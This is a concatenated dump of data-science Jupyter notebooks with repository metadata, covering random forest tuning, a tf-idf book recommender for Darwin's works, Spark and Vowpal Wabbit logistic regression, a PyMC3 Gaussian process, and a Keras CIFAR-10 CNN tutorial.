train_test_split\n\ntarget = 'have-disorder'\nX = clean_DF.drop(labels = [target], axis='columns').copy()\ny = clean_DF[target]\nX_train, X_rem, y_train, y_rem = train_test_split(X,y, train_size=0.8)\n# split validate set and test set\nX_valid, X_test, y_valid, y_test = train_test_split(X_rem,y_rem, test_size=0.5)", "_____no_output_____" ] ], [ [ "1. Correctly splitting the dataset into train, validate, and holdout", "_____no_output_____" ] ], [ [ "# Import the model we are using\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\n\nbaseline_classifier_model = RandomForestClassifier()\n# Train the baseline model on training data\nbaseline_classifier_model = baseline_classifier_model.fit(X_train, y_train)", "_____no_output_____" ] ], [ [ "2. Correctly training your model on the training dataset", "_____no_output_____" ] ], [ [ "# Use the forest's predict method on the holdout\npredictions = baseline_classifier_model.predict(X_valid)\n# Calculate the accuracy_score\naccuracy_score(predictions, y_valid)", "_____no_output_____" ] ], [ [ "3. Correctly scoring your model on the validation dataset", "_____no_output_____" ] ], [ [ "# Use the forest's predict method on the holdout\npredictions = baseline_classifier_model.predict(X_test)\n# Calculate the accuracy_score\naccuracy_score(predictions, y_test)", "_____no_output_____" ] ], [ [ "4. Correctly explaining if your model overfit or not (or state it is impossible to tell and why)\n\n- As the validation set and test set both yielded similar results, it does not appear that the model is overfitted. 
This is because it doesn't perform any worse when tested on data that it has not yet seen, so it has not “memorized” the inputs.", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import GridSearchCV\n\nrfc=RandomForestClassifier(random_state=42)\nparam_grid = { \n 'n_estimators': [200, 500],\n 'max_features': ['auto', 'sqrt', 'log2'],\n 'max_depth' : [4,6,8],\n 'criterion' :['gini', 'entropy'],\n 'min_samples_split':[2,4]\n}\nCV_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv= 5)\nCV_rfc.fit(X_train, y_train)", "_____no_output_____" ] ], [ [ "5. Tune at least five parameters using GridSearchCV, with 2-4 values for each parameter", "_____no_output_____" ] ], [ [ "CV_rfc.best_params_", "_____no_output_____" ], [ "rfc1 = RandomForestClassifier(random_state=42, max_features='auto', n_estimators= 500, max_depth=6, min_samples_split=2, criterion='entropy')\nrfc1.fit(X_train, y_train)\npred=rfc1.predict(X_valid)\naccuracy_score(pred, y_valid)", "_____no_output_____" ] ], [ [ "6. Report results if the hyperparamater tuning helped model performance.\n\nWe do have a 2% improvement on model performance", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
e72f37f298238f33b402a688953d23a955e3cdae
17,269
ipynb
Jupyter Notebook
notebook.ipynb
MLVPRASAD/Book-Recommendations-from-Charles-Darwin
6184b494defdffe33531f039d25a61961f565b86
[ "MIT" ]
1
2022-03-23T18:24:11.000Z
2022-03-23T18:24:11.000Z
notebook.ipynb
MLVPRASAD/Book-Recommendations-from-Charles-Darwin
6184b494defdffe33531f039d25a61961f565b86
[ "MIT" ]
null
null
null
notebook.ipynb
MLVPRASAD/Book-Recommendations-from-Charles-Darwin
6184b494defdffe33531f039d25a61961f565b86
[ "MIT" ]
null
null
null
17,269
17,269
0.729168
[ [ [ "## 1. Darwin's bibliography\n<p><img src=\"https://assets.datacamp.com/production/project_607/img/CharlesDarwin.jpg\" alt=\"Charles Darwin\" width=\"300px\"></p>\n<p>Charles Darwin is one of the few universal figures of science. His most renowned work is without a doubt his \"<em>On the Origin of Species</em>\" published in 1859 which introduced the concept of natural selection. But Darwin wrote many other books on a wide range of topics, including geology, plants or his personal life. In this notebook, we will automatically detect how closely related his books are to each other.</p>\n<p>To this purpose, we will develop the bases of <strong>a content-based book recommendation system</strong>, which will determine which books are close to each other based on how similar the discussed topics are. The methods we will use are commonly used in text- or documents-heavy industries such as legal, tech or customer support to perform some common task such as text classification or handling search engine queries.</p>\n<p>Let's take a look at the books we'll use in our recommendation system.</p>", "_____no_output_____" ] ], [ [ "# Import library\nimport glob\n\n# The books files are contained in this folder\nfolder = \"datasets/\"\n\n# List all the .txt files and sort them alphabetically\nfiles = glob.glob(folder+'*.txt')\n# ... YOUR CODE FOR TASK 1 ...\nfiles.sort()", "_____no_output_____" ] ], [ [ "## 2. Load the contents of each book into Python\n<p>As a first step, we need to load the content of these books into Python and do some basic pre-processing to facilitate the downstream analyses. We call such a collection of texts <strong>a corpus</strong>. 
We will also store the titles for these books for future reference and print their respective length to get a gauge for their contents.</p>", "_____no_output_____" ] ], [ [ "# Import libraries\nimport re, os\n\n# Initialize the object that will contain the texts and titles\ntxts = []\ntitles = []\n\nfor n in files:\n # Open each file\n f = open(n, encoding='utf-8-sig')\n # Remove all non-alpha-numeric characters\n data = re.sub('[\\W_]+', ' ', f.read())\n # ... YOUR CODE FOR TASK 2 ...\n # Store the texts and titles of the books in two separate lists\n \n txts.append(data)\n titles.append(os.path.basename(n).replace(\".txt\", \"\"))\n\n# Print the length, in characters, of each book\n[len(t) for t in txts]", "_____no_output_____" ] ], [ [ "## 3. Find \"On the Origin of Species\"\n<p>For the next parts of this analysis, we will often check the results returned by our method for a given book. For consistency, we will refer to Darwin's most famous book: \"<em>On the Origin of Species</em>.\" Let's find to which index this book is associated.</p>", "_____no_output_____" ] ], [ [ "# Browse the list containing all the titles\nfor i in range(len(titles)):\n # Store the index if the title is \"OriginofSpecies\"\n # ... YOUR CODE FOR TASK 3 ...\n if titles[i] == 'OriginofSpecies':\n ori = i\n break\nori\n# Print the stored index\n# ... YOUR CODE FOR TASK 3 ...", "_____no_output_____" ] ], [ [ "## 4. Tokenize the corpus\n<p>As a next step, we need to transform the corpus into a format that is easier to deal with for the downstream analyses. We will tokenize our corpus, i.e., transform each text into a list of the individual words (called tokens) it is made of. 
To check the output of our process, we will print the first 20 tokens of \"<em>On the Origin of Species</em>\".</p>", "_____no_output_____" ] ], [ [ "# Define a list of stop words\nstoplist = set('for a of the and to in to be which some is at that we i who whom show via may my our might as well'.split())\n\n# Convert the text to lower case \n\ntxts_lower_case = [txt.lower() for txt in txts]\n\n# Transform the text into tokens \ntxts_split = [txt.split() for txt in txts_lower_case]\n\n# Remove tokens which are part of the list of stop words\ntexts = [[word for word in txt if word not in stoplist] for txt in txts_split]\n\n# Print the first 20 tokens for the \"On the Origin of Species\" book\ntexts[ori][: 20]", "_____no_output_____" ] ], [ [ "## 5. Stemming of the tokenized corpus\n<p>If you have read <em>On the Origin of Species</em>, you will have noticed that Charles Darwin can use different words to refer to a similar concept. For example, the concept of selection can be described by words such as <em>selection</em>, <em>selective</em>, <em>select</em> or <em>selects</em>. This will dilute the weight given to this concept in the book and potentially bias the results of the analysis.</p>\n<p>To solve this issue, it is a common practice to use a <strong>stemming process</strong>, which will group together the inflected forms of a word so they can be analysed as a single item: <strong>the stem</strong>. 
In our <em>On the Origin of Species</em> example, the words related to the concept of selection would be gathered under the <em>select</em> stem.</p>\n<p>As we are analysing 20 full books, the stemming algorithm can take several minutes to run and, in order to make the process faster, we will directly load the final results from a pickle file and review the method used to generate it.</p>", "_____no_output_____" ] ], [ [ "import pickle\n\ntexts_stem = pickle.load(open('datasets/texts_stem.p', 'rb'))\n\n# Print the 20 first stemmed tokens from the \"On the Origin of Species\" book\ntexts_stem[ori][: 20]", "_____no_output_____" ] ], [ [ "## 6. Building a bag-of-words model\n<p>Now that we have transformed the texts into stemmed tokens, we need to build models that will be useable by downstream algorithms.</p>\n<p>First, we need to will create a universe of all words contained in our corpus of Charles Darwin's books, which we call <em>a dictionary</em>. Then, using the stemmed tokens and the dictionary, we will create <strong>bag-of-words models</strong> (BoW) of each of our texts. The BoW models will represent our books as a list of all uniques tokens they contain associated with their respective number of occurrences. </p>\n<p>To better understand the structure of such a model, we will print the five first elements of one of the \"<em>On the Origin of Species</em>\" BoW model.</p>", "_____no_output_____" ] ], [ [ "\nfrom gensim import corpora\n\n# Create a dictionary from the stemmed tokens\ndictionary = corpora.Dictionary(texts_stem)\n\n# Create a bag-of-words model for each book, using the previously generated dictionary\nbows = [dictionary.doc2bow(txt) for txt in texts_stem]\n\n# Print the first five elements of the On the Origin of species' BoW model\nbows[ori][: 5]", "_____no_output_____" ] ], [ [ "## 7. 
The most common words of a given book\n<p>The results returned by the bag-of-words model is certainly easy to use for a computer but hard to interpret for a human. It is not straightforward to understand which stemmed tokens are present in a given book from Charles Darwin, and how many occurrences we can find.</p>\n<p>In order to better understand how the model has been generated and visualize its content, we will transform it into a DataFrame and display the 10 most common stems for the book \"<em>On the Origin of Species</em>\".</p>", "_____no_output_____" ] ], [ [ "import pandas as pd\n\n# Convert the BoW model for \"On the Origin of Species\" into a DataFrame\ndf_bow_origin = pd.DataFrame(bows[ori])\n# Add the column names to the DataFrame\ndf_bow_origin.columns = ['index', 'occurrences']\n\n# Add a column containing the token corresponding to the dictionary index\ndf_bow_origin['token'] = df_bow_origin['index'].apply(lambda x: dictionary[x])\n\n# Sort the DataFrame by descending number of occurrences and print the first 10 values\ndf_bow_origin = df_bow_origin.sort_values('occurrences', ascending=False)\ndf_bow_origin.head(10)", "_____no_output_____" ] ], [ [ "## 8. Build a tf-idf model\n<p>If it wasn't for the presence of the stem \"<em>speci</em>\", we would have a hard time to guess this BoW model comes from the <em>On the Origin of Species</em> book. The most recurring words are, apart from few exceptions, very common and unlikely to carry any information peculiar to the given book. We need to use an additional step in order to determine which tokens are the most specific to a book.</p>\n<p>To do so, we will use a <strong>tf-idf model</strong> (term frequency–inverse document frequency). This model defines the importance of each word depending on how frequent it is in this text and how infrequent it is in all the other documents. 
As a result, a high tf-idf score for a word will indicate that this word is specific to this text.</p>\n<p>After computing those scores, we will print the 10 words most specific to the \"<em>On the Origin of Species</em>\" book (i.e., the 10 words with the highest tf-idf score).</p>", "_____no_output_____" ] ], [ [ "# Load the gensim functions that will allow us to generate tf-idf models\nfrom gensim.models import TfidfModel\n\n# Generate the tf-idf model\nmodel = TfidfModel(bows)\n\n# Print the model for \"On the Origin of Species\"\nmodel[bows[ori]]", "_____no_output_____" ] ], [ [ "## 9. The results of the tf-idf model\n<p>Once again, the format of those results is hard to interpret for a human. Therefore, we will transform it into a more readable version and display the 10 most specific words for the \"<em>On the Origin of Species</em>\" book.</p>", "_____no_output_____" ] ], [ [ "# Convert the tf-idf model for \"On the Origin of Species\" into a DataFrame\ndf_tfidf = ...\n\n# Name the columns of the DataFrame id and score\n# ... YOUR CODE FOR TASK 9 ...\n\n# Add the tokens corresponding to the numerical indices for better readability\n# ... YOUR CODE FOR TASK 9 ...\n\n# Sort the DataFrame by descending tf-idf score and print the first 10 rows.\n# ... YOUR CODE FOR TASK 9 ...", "_____no_output_____" ] ], [ [ "## 10. Compute distance between texts\n<p>The results of the tf-idf algorithm now return stemmed tokens which are specific to each book. We can, for example, see that topics such as selection, breeding or domestication are defining \"<em>On the Origin of Species</em>\" (and yes, in this book, Charles Darwin talks quite a lot about pigeons too). 
Now that we have a model associating tokens to how specific they are to each book, we can measure how related to books are between each other.</p>\n<p>To this purpose, we will use a measure of similarity called <strong>cosine similarity</strong> and we will visualize the results as a distance matrix, i.e., a matrix showing all pairwise distances between Darwin's books.</p>", "_____no_output_____" ] ], [ [ "# Load the library allowing similarity computations\nfrom gensim import similarities\n\n# Compute the similarity matrix (pairwise distance between all texts)\nsims = ...\n\n# Transform the resulting list into a dataframe\nsim_df = ...\n\n# Add the titles of the books as columns and index of the dataframe\n# ... YOUR CODE FOR TASK 10 ...\n\n# Print the resulting matrix\n# ... YOUR CODE FOR TASK 10 ...", "_____no_output_____" ] ], [ [ "## 11. The book most similar to \"On the Origin of Species\"\n<p>We now have a matrix containing all the similarity measures between any pair of books from Charles Darwin! We can now use this matrix to quickly extract the information we need, i.e., the distance between one book and one or several others. </p>\n<p>As a first step, we will display which books are the most similar to \"<em>On the Origin of Species</em>,\" more specifically we will produce a bar chart showing all books ranked by how similar they are to Darwin's landmark work.</p>", "_____no_output_____" ] ], [ [ "# This is needed to display plots in a notebook\n%matplotlib inline\n\n# Import libraries\nimport matplotlib.pyplot as plt\n\n# Select the column corresponding to \"On the Origin of Species\" and \nv = ...\n\n# Sort by ascending scores\nv_sorted = ...\n\n# Plot this data has a horizontal bar plot\n# ... YOUR CODE FOR TASK 11 ...\n\n# Modify the axes labels and plot title for a better readability\n# ... YOUR CODE FOR TASK 11 ...", "_____no_output_____" ] ], [ [ "## 12. 
Which books have similar content?\n<p>This turns out to be extremely useful if we want to determine a given book's most similar work. For example, we have just seen that if you enjoyed \"<em>On the Origin of Species</em>,\" you can read books discussing similar concepts such as \"<em>The Variation of Animals and Plants under Domestication</em>\" or \"<em>The Descent of Man, and Selection in Relation to Sex</em>.\" If you are familiar with Darwin's work, these suggestions will likely seem natural to you. Indeed, <em>On the Origin of Species</em> has a whole chapter about domestication and <em>The Descent of Man, and Selection in Relation to Sex</em> applies the theory of natural selection to human evolution. Hence, the results make sense.</p>\n<p>However, we now want to have a better understanding of the big picture and see how Darwin's books are generally related to each other (in terms of topics discussed). To this purpose, we will represent the whole similarity matrix as a dendrogram, which is a standard tool to display such data. <strong>This last approach will display all the information about book similarities at once.</strong> For example, we can find a book's closest relative but, also, we can visualize which groups of books have similar topics (e.g., the cluster about Charles Darwin personal life with his autobiography and letters). If you are familiar with Darwin's bibliography, the results should not surprise you too much, which indicates the method gives good results. Otherwise, next time you read one of the author's book, you will know which other books to read next in order to learn more about the topics it addressed.</p>", "_____no_output_____" ] ], [ [ "# Import libraries\nfrom scipy.cluster import hierarchy\n\n# Compute the clusters from the similarity matrix,\n# using the Ward variance minimization algorithm\nZ = ...\n\n# Display this result as a horizontal dendrogram\n# ... YOUR CODE FOR TASK 12 ...", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72f48a859d658f1e5de96da87438e6a699fc568
5,602
ipynb
Jupyter Notebook
0022/quadgk.ipynb
genkuroki/public
339ea5dfd424492a6b21d1df299e52d48902de18
[ "MIT" ]
10
2021-06-06T00:33:49.000Z
2022-01-24T06:56:08.000Z
0022/quadgk.ipynb
genkuroki/public
339ea5dfd424492a6b21d1df299e52d48902de18
[ "MIT" ]
null
null
null
0022/quadgk.ipynb
genkuroki/public
339ea5dfd424492a6b21d1df299e52d48902de18
[ "MIT" ]
3
2021-08-02T11:58:34.000Z
2021-12-11T11:46:05.000Z
24.678414
153
0.508033
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e72f6155e8960664705608e3353a36538c26ba38
7,094
ipynb
Jupyter Notebook
exercises/04_logistic_regression.ipynb
milroy/Spark-Meetup
172157e2ae9968b933a28eb590d4d6b8d2037d34
[ "MIT" ]
1
2015-11-12T19:38:24.000Z
2015-11-12T19:38:24.000Z
exercises/04_logistic_regression.ipynb
milroy/Spark-Meetup
172157e2ae9968b933a28eb590d4d6b8d2037d34
[ "MIT" ]
null
null
null
exercises/04_logistic_regression.ipynb
milroy/Spark-Meetup
172157e2ae9968b933a28eb590d4d6b8d2037d34
[ "MIT" ]
null
null
null
21.113095
98
0.53806
[ [ [ "# Logistic Regression", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom sklearn import datasets\nfrom sklearn.utils import shuffle\n\nrandom_state = np.random.RandomState(0)\n\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\nprint y", "_____no_output_____" ], [ "import seaborn as sns\n\n%matplotlib inline\niris_sns = sns.load_dataset(\"iris\")\n\ng = sns.PairGrid(iris_sns)\ng.map_diag(sns.kdeplot)\ng.map_offdiag(sns.kdeplot, cmap=\"Blues_d\", n_levels=6);\nsns.plt.show()", "_____no_output_____" ] ], [ [ "#### Make it a binary classification problem by removing the first class", "_____no_output_____" ] ], [ [ "X, y = X[y != 0], y[y != 0]\nn_samples, n_features = X.shape\n\ny[y==1] = 0\ny[y==2] = 1", "_____no_output_____" ], [ "print X.shape, y.shape\nprint set(y)", "_____no_output_____" ] ], [ [ "## Using `sklearn`", "_____no_output_____" ] ], [ [ "from sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.cross_validation import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\nclf = LogisticRegression()\nclf.fit(X_train,y_train)\ny_pred_test = clf.predict(X_test)\ny_pred_train = clf.predict(X_train)\nprint accuracy_score(y_train, y_pred_train)\nprint accuracy_score(y_test, y_pred_test)", "_____no_output_____" ] ], [ [ "## Save to file", "_____no_output_____" ] ], [ [ "print y_train.shape\nprint y_train.reshape(y_train.shape[0],1).shape\nprint X_train.shape\ncX = np.concatenate((y_train.reshape(80,1), X_train), axis=1)\ncX.shape", "_____no_output_____" ] ], [ [ "Write to file....", "_____no_output_____" ] ], [ [ "np.savetxt('iris_train.csv', cX, delimiter=' ', fmt='%0.4f')\n!head iris_train.csv", "_____no_output_____" ], [ "cX = np.concatenate((y_test.reshape(len(y_test),1), X_test), axis=1)\nnp.savetxt('iris_test.csv', cX, delimiter=' ', fmt='%0.4f')", "_____no_output_____" ] ], [ [ "## With `Spark`", 
"_____no_output_____" ] ], [ [ "import findspark\nimport os\nfindspark.init() # you need that before import pyspark.\n\nimport pyspark\nsc = pyspark.SparkContext()", "_____no_output_____" ], [ "points = sc.textFile('../data/iris_train.csv', 18)\npoints.take(5)", "_____no_output_____" ], [ "from pyspark.mllib.classification import LogisticRegressionWithSGD\nfrom pyspark.mllib.classification import LabeledPoint \n\nparsed_data = points.map(lambda line: np.array([float(x) for x in line.split(' ')]))\nparsed_data = parsed_data.map(lambda arr: LabeledPoint(arr[0],arr[1:]))\n\nprint type(parsed_data)\nparsed_data.take(1)", "_____no_output_____" ], [ "model = LogisticRegressionWithSGD.train(parsed_data)", "_____no_output_____" ] ], [ [ "Any idea about the \"Cleaned shuffle\" messages?\nHint: narrow versus wide transformations.", "_____no_output_____" ] ], [ [ "y = parsed_data.map(lambda x: x.label)\ny_pred = parsed_data.map(lambda x: model.predict(x.features))", "_____no_output_____" ], [ "tmp = y.zip(y_pred)\ntmp.take(5)", "_____no_output_____" ] ], [ [ "Training accuracy", "_____no_output_____" ] ], [ [ "1.0 - tmp.filter(lambda (y, p): y!=p).count()/float(parsed_data.count())", "_____no_output_____" ] ], [ [ "Test accuracy", "_____no_output_____" ] ], [ [ "points = sc.textFile('../data/iris_test.csv', 18)\nparsed_data = points.map(lambda line: np.array([float(x) for x in line.split(' ')]))\nparsed_data = parsed_data.map(lambda arr: LabeledPoint(arr[0],arr[1:]))\ny_pred = parsed_data.map(lambda x: model.predict(x.features))\ny = parsed_data.map(lambda x: x.label)\ntmp = y.zip(y_pred)\n1.0 - tmp.filter(lambda (y, p): y!=p).count()/float(parsed_data.count())", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72f64c325b9c46b07c81d0a18ba906be8893ef7
3,581
ipynb
Jupyter Notebook
content/downloads/notebooks/Gaussian_process.ipynb
BlastingJavier/BlastingJavier.github.io
44620e80bb8ffa20d9ddb0b73a05ff184f24a98c
[ "MIT" ]
null
null
null
content/downloads/notebooks/Gaussian_process.ipynb
BlastingJavier/BlastingJavier.github.io
44620e80bb8ffa20d9ddb0b73a05ff184f24a98c
[ "MIT" ]
null
null
null
content/downloads/notebooks/Gaussian_process.ipynb
BlastingJavier/BlastingJavier.github.io
44620e80bb8ffa20d9ddb0b73a05ff184f24a98c
[ "MIT" ]
null
null
null
49.054795
1,443
0.610723
[ [ [ "import numpy as np\nimport pymc3 as pm\n\n# A one dimensional column vector of inputs.\nX = np.linspace(0, 1, 10)[:,None]\n\nwith pm.Model() as marginal_gp_model:\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls=0.1)\n\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n\n # The scale of the white noise term can be provided,\n sigma = pm.HalfCauchy(\"sigma\", beta=5)\n y_ = gp.marginal_likelihood(\"y\", X=X, y=y, noise=sigma)\n\n # OR a covariance function for the noise can be given\n # noise_l = pm.Gamma(\"noise_l\", alpha=2, beta=2)\n # cov_func_noise = pm.gp.cov.Exponential(1, noise_l) + pm.gp.cov.WhiteNoise(sigma=0.1)\n # y_ = gp.marginal_likelihood(\"y\", X=X, y=y, noise=cov_func_noise)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code" ] ]
e72f8aeafb30c578390ee850c5e246d75cc23ea3
4,399
ipynb
Jupyter Notebook
python/docs/source/tutorials/python_first_steps.ipynb
jonpsy/vowpal_wabbit
9019232f4582e9b70be0e711fd94a27b12691eb3
[ "BSD-3-Clause" ]
null
null
null
python/docs/source/tutorials/python_first_steps.ipynb
jonpsy/vowpal_wabbit
9019232f4582e9b70be0e711fd94a27b12691eb3
[ "BSD-3-Clause" ]
null
null
null
python/docs/source/tutorials/python_first_steps.ipynb
jonpsy/vowpal_wabbit
9019232f4582e9b70be0e711fd94a27b12691eb3
[ "BSD-3-Clause" ]
null
null
null
32.585185
316
0.633098
[ [ [ "# Python Basics\n\nThis tutorial is a quick introduction to training and testing your model with Vowpal Wabbit using Python. We explore passing some data to Vowpal Wabbit to learn a model and get a prediction.\n\nFor more advanced Vowpal Wabbit tutorials, including how to format data and understand results, see [Tutorials](https://vowpalwabbit.org/tutorials.html).\n\n```{admonition} Prerequisites\nTo install Vowpal Wabbit see [Get Started](https://vowpalwabbit.org/start.html).\n```\n\n## Getting started\n\nFirst, import the [Vowpal Wabbit Python package](https://github.com/VowpalWabbit/vowpal_wabbit/tree/master/python) for this tutorial:\n", "_____no_output_____" ] ], [ [ "from vowpalwabbit import pyvw", "_____no_output_____" ] ], [ [ "Next, we create an instance of Vowpal Wabbit, and pass the `quiet=True` option to avoid diagnostic information output to `stdout` location:", "_____no_output_____" ] ], [ [ "model = pyvw.vw(quiet=True)", "_____no_output_____" ] ], [ [ "## Training scenario and dataset\n\nFor this tutorial scenario, we want Vowpal Wabbit to help us predict whether or not our house will require a new roof in the next 10 years.\n\nTo create some examples, we use the Vowpal Wabbit text format and then learn on them:", "_____no_output_____" ] ], [ [ "train_examples = [\n \"0 | price:.23 sqft:.25 age:.05 2006\",\n \"1 | price:.18 sqft:.15 age:.35 1976\",\n \"0 | price:.53 sqft:.32 age:.87 1924\",\n]\n\nfor example in train_examples:\n model.learn(example)", "_____no_output_____" ] ], [ [ "> **Note:** For more details on Vowpal Wabbit input format and feature hashing techniques see the [Linear Regression Tutorial](cmd_linear_regression.md).\n\nNow, we create a `test_example` to use for prediction:", "_____no_output_____" ] ], [ [ "test_example = \"| price:.46 sqft:.4 age:.10 1924\"\n\nprediction = model.predict(test_example)\nprint(prediction)", "_____no_output_____" ] ], [ [ "### Vowpal Wabbit results\n\nThe model predicted a value of **0**. 
According to our learning model, our house will not need a new roof in the next 10 years (at least that is the result from just three examples we used in our training dataset).\n\n## More to explore\n\n- To learn how to approach a contextual bandits problem using Vowpal Wabbit — including how to work with different contextual bandits approaches, how to format data, and understand the results — see the [Contextual Bandit Reinforcement Learning Tutorial](python_Contextual_bandits_and_Vowpal_Wabbit.ipynb).\n- For more on the contextual bandits approach to reinforcement learning, including a content personalization scenario, see the [Contextual Bandit Simulation Tutorial](python_Simulating_a_news_personalization_scenario_using_Contextual_Bandits.ipynb).\n- See the [Linear Regression Tutorial](cmd_linear_regression.md) for a different look at the roof replacement problem and learn more about Vowpal Wabbit's format and understanding the results.\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72f8ee23ad53692f13d408338a1f847390db478
56,127
ipynb
Jupyter Notebook
nb_ex4_2_cnn_cifar10_cl.ipynb
jskDr/keraspp_2022
e10f4f849ad6a7354a05084e2cd9cec8acd62ef2
[ "MIT" ]
null
null
null
nb_ex4_2_cnn_cifar10_cl.ipynb
jskDr/keraspp_2022
e10f4f849ad6a7354a05084e2cd9cec8acd62ef2
[ "MIT" ]
null
null
null
nb_ex4_2_cnn_cifar10_cl.ipynb
jskDr/keraspp_2022
e10f4f849ad6a7354a05084e2cd9cec8acd62ef2
[ "MIT" ]
1
2022-03-29T13:15:22.000Z
2022-03-29T13:15:22.000Z
75.237265
31,498
0.759207
[ [ [ "## 4.3 컬러 이미지를 분류하는 CNN 구현\nCNN을 이용해 사진을 분류하는 방법을 다룹니다.\n\n### 4.3.1 분류 CNN 패키지 임포트", "_____no_output_____" ], [ "1. 필요한 패키지들을 임포트합니다.", "_____no_output_____" ] ], [ [ "from sklearn import model_selection, metrics\nfrom sklearn.preprocessing import MinMaxScaler", "_____no_output_____" ] ], [ [ "- 유용한 기능을 제공하는 다른 파이썬 패키지도 임포트합니다.", "_____no_output_____" ] ], [ [ "import numpy as np\nimport matplotlib.pyplot as plt\nimport os", "_____no_output_____" ] ], [ [ "- 케라스 모델링을 위한 서브패키지들을 불러옵니다.", "_____no_output_____" ] ], [ [ "from keras import backend as K\nfrom keras.utils import np_utils\nfrom keras.models import Model\nfrom keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Dense, Dropout", "_____no_output_____" ] ], [ [ "- 케라스를 편리하게 사용하기 위해 여기서 만든 2가지 모듈을 불러옵니다.", "_____no_output_____" ] ], [ [ "from keraspp import skeras\nfrom keraspp import sfile", "_____no_output_____" ] ], [ [ "### 4.3.2 분류 CNN 모델링", "_____no_output_____" ], [ "2. 분류 CNN 모델링을 만듭니다.", "_____no_output_____" ] ], [ [ "# 2. 
분류 CNN 모델링\nclass CNN(Model):\n def __init__(self, nb_classes): \n super(CNN,self).__init__() \n self.nb_classes = nb_classes\n \n self.conv2D_A = Conv2D(32, kernel_size=(3, 3), activation='relu')\n self.conv2D_B = Conv2D(64, (3, 3), activation='relu')\n self.maxPooling2D_A = MaxPooling2D(pool_size=(2, 2))\n self.dropout_A = Dropout(0.25)\n self.flatten = Flatten()\n \n self.dense_A = Dense(128, activation='relu')\n self.dropout_B = Dropout(0.5)\n self.dense_B = Dense(nb_classes, activation='softmax', name='preds')\n \n def call(self, x):\n h = self.conv2D_A(x)\n h = self.conv2D_B(h)\n h = self.maxPooling2D_A(h)\n h = self.dropout_A(h)\n h = self.flatten(h)\n\n h = self.dense_A(h)\n h = self.dropout_B(h)\n\n y = self.dense_B(h)\n \n return y", "_____no_output_____" ], [ "nb_classes = 10\nmodel = CNN(nb_classes=nb_classes)\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adadelta', metrics=['accuracy'])", "_____no_output_____" ] ], [ [ "### 4.3.3 분류 CNN을 위한 데이터 준비", "_____no_output_____" ], [ "3. 주어진 데이터를 해당 머신러닝에 사용하기 적합하도록 조정하는 기능을 하는 DataSet 클래스를 만듭니다.", "_____no_output_____" ] ], [ [ "# 3. 
분류 CNN을 위한 데이터 준비\nclass DataSet:\n def __init__(self, X, y, nb_classes, scaling=True, \n test_size=0.2, random_state=0):\n self.X = X\n self.add_channels()\n X = self.X\n \n # the data, shuffled and split between train and test sets\n X_train, X_test, y_train, y_test = model_selection.train_test_split(\n X, y, test_size=0.2, random_state=random_state)\n\n print(X_train.shape, y_train.shape)\n\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n\n if scaling:\n # scaling to have (0, 1) for each feature (each pixel)\n scaler = MinMaxScaler()\n n = X_train.shape[0]\n X_train = scaler.fit_transform(\n X_train.reshape(n, -1)).reshape(X_train.shape)\n n = X_test.shape[0]\n X_test = scaler.transform(\n X_test.reshape(n, -1)).reshape(X_test.shape)\n self.scaler = scaler\n\n print('X_train shape:', X_train.shape)\n print(X_train.shape[0], 'train samples')\n print(X_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, nb_classes)\n Y_test = np_utils.to_categorical(y_test, nb_classes)\n\n self.X_train, self.X_test = X_train, X_test\n self.Y_train, self.Y_test = Y_train, Y_test\n self.y_train, self.y_test = y_train, y_test\n\n def add_channels(self):\n X = self.X\n\n if len(X.shape) == 3:\n N, img_rows, img_cols = X.shape\n\n if K.image_dim_ordering() == 'th':\n X = X.reshape(X.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n X = X.reshape(X.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n else:\n input_shape = X.shape[1:] # channel is already included.\n\n self.X = X\n self.input_shape = input_shape", "_____no_output_____" ], [ "from keras import datasets\n(X, y), (x_test, y_test) = 